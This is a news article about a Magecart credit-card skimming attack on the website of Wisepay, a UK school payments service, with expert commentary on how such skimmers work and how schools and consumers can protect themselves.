Kenishirotie - stock.adobe.com

Magecart strikes website of school payments service Wisepay

Magecart credit card skimmer harvested financial data of users of Wisepay’s platform over a two-day period

Wisepay, a supplier of financial services for schools that enables parents to pay for school meals, clubs and trips, among other things, has recovered its service after discovering a Magecart skimmer on its website was leaching credit card numbers earlier in October

The firm said that data on an undisclosed number of transactions to approximately 300 schools may have been stolen when users who thought they were making legitimate payments were redirected, without their knowledge, to a malicious external page masquerading as Wisepay’s website.

The firm’s managing director Richard Grazier told the BBC the website was compromised via a “backdoor” in its database, and that only a small subset of the platform’s users would have noticed. This may be in part because the initial compromise occurred late on Friday 2 October and was discovered the following Monday, and far fewer payments would have been processed over the weekend.

Wisepay has notified both the Information Commissioner’s Office (ICO) and the police about the incident, which it said had not compromised any of the data it holds on its systems, and warned parents that any who think they may have been affected should immediately contact their banks or credit card providers, and change their online banking credentials.

Magecart works by injecting malicious JavaScript code into websites and third-party payment systems to steal credit card information while people enter it at the checkout, thinking they are making a legitimate payment. Recent high-profile victims include accessories store Claire’s.

It is a relatively simple form of cyber attack, with high reward potential for malicious actors, and as a result the technique is widely used by a variety of threat actors, including the infamous Lazarus group, which is linked to the North Korean government. Their prevalence has spiked since March 2020 given far more people are shopping online during the Covid-19 pandemic.

Often, Magecart attacks begin in a targeted spearphishing attack on a member of staff at the victim organisation, but cyber criminals have also been known to exploit unsecured Amazon Web Services (AWS) S3 buckets and unpatched versions of Adobe’s Magento software, which is about to enter end-of-life.

ProPrivacy’s Attila Tomaschek said: “The Wisepay cyber attack highlights very clearly the dangers of online card skimming attacks. Wisepay would be an attractive target for cyber criminals looking to launch such an attack due to the large number of UK schools served by the online payment portal.

“The main problem, however, is that these types of attacks can be incredibly difficult to detect and, therefore, avoid. Those entering their credit card information into a compromised payment page would really have no idea that they were handing their card details over to cyber criminals because these malicious payment pages are designed to appear perfectly legitimate.

“While the responsibility to maintain secure payment pages obviously resides with the merchant, consumers can protect themselves by keeping a close, continuous eye on their credit reports and bank account statements and refraining from clicking on dodgy links or entering sensitive information onto any online form that seems off or compromised in any way,” said Tomaschek.

“Educational institutions need to keep their eyes on the networks for signs of intruders or user accounts escalating privileges, as well as making sure the fundamentals are still happening despite all the distractions of the start of term, like making sure old and unused user profiles are shut down and can’t be used by attackers,” added Jérôme Robert, director at active directory specialist Alsid.

“Given the turmoil in the education sector right now thanks to Covid, this is yet another headache for schools. There has been a spate of highly publicised ransomware attacks against universities recently, likely timed to coincide with the start of term – which attackers hope will increase their chances of success,” he said.

Read more about Magecart

  • RiskIQ has identified that variations in software tools used for Magecart ecommerce site attacks are based on kits from the same group.
  • The Magecart credit card skimmer found on the website of retailer Claire’s Accessories was likely put there by the Lazarus or Hidden Cobra North Korean APT group, reports Sansec.
  • Three alleged cybercriminals suspected of being associated with Magecart were arrested in Indonesia via an Interpol-assisted operation called Operation Night Fury.

Read more on Hackers and cybercrime prevention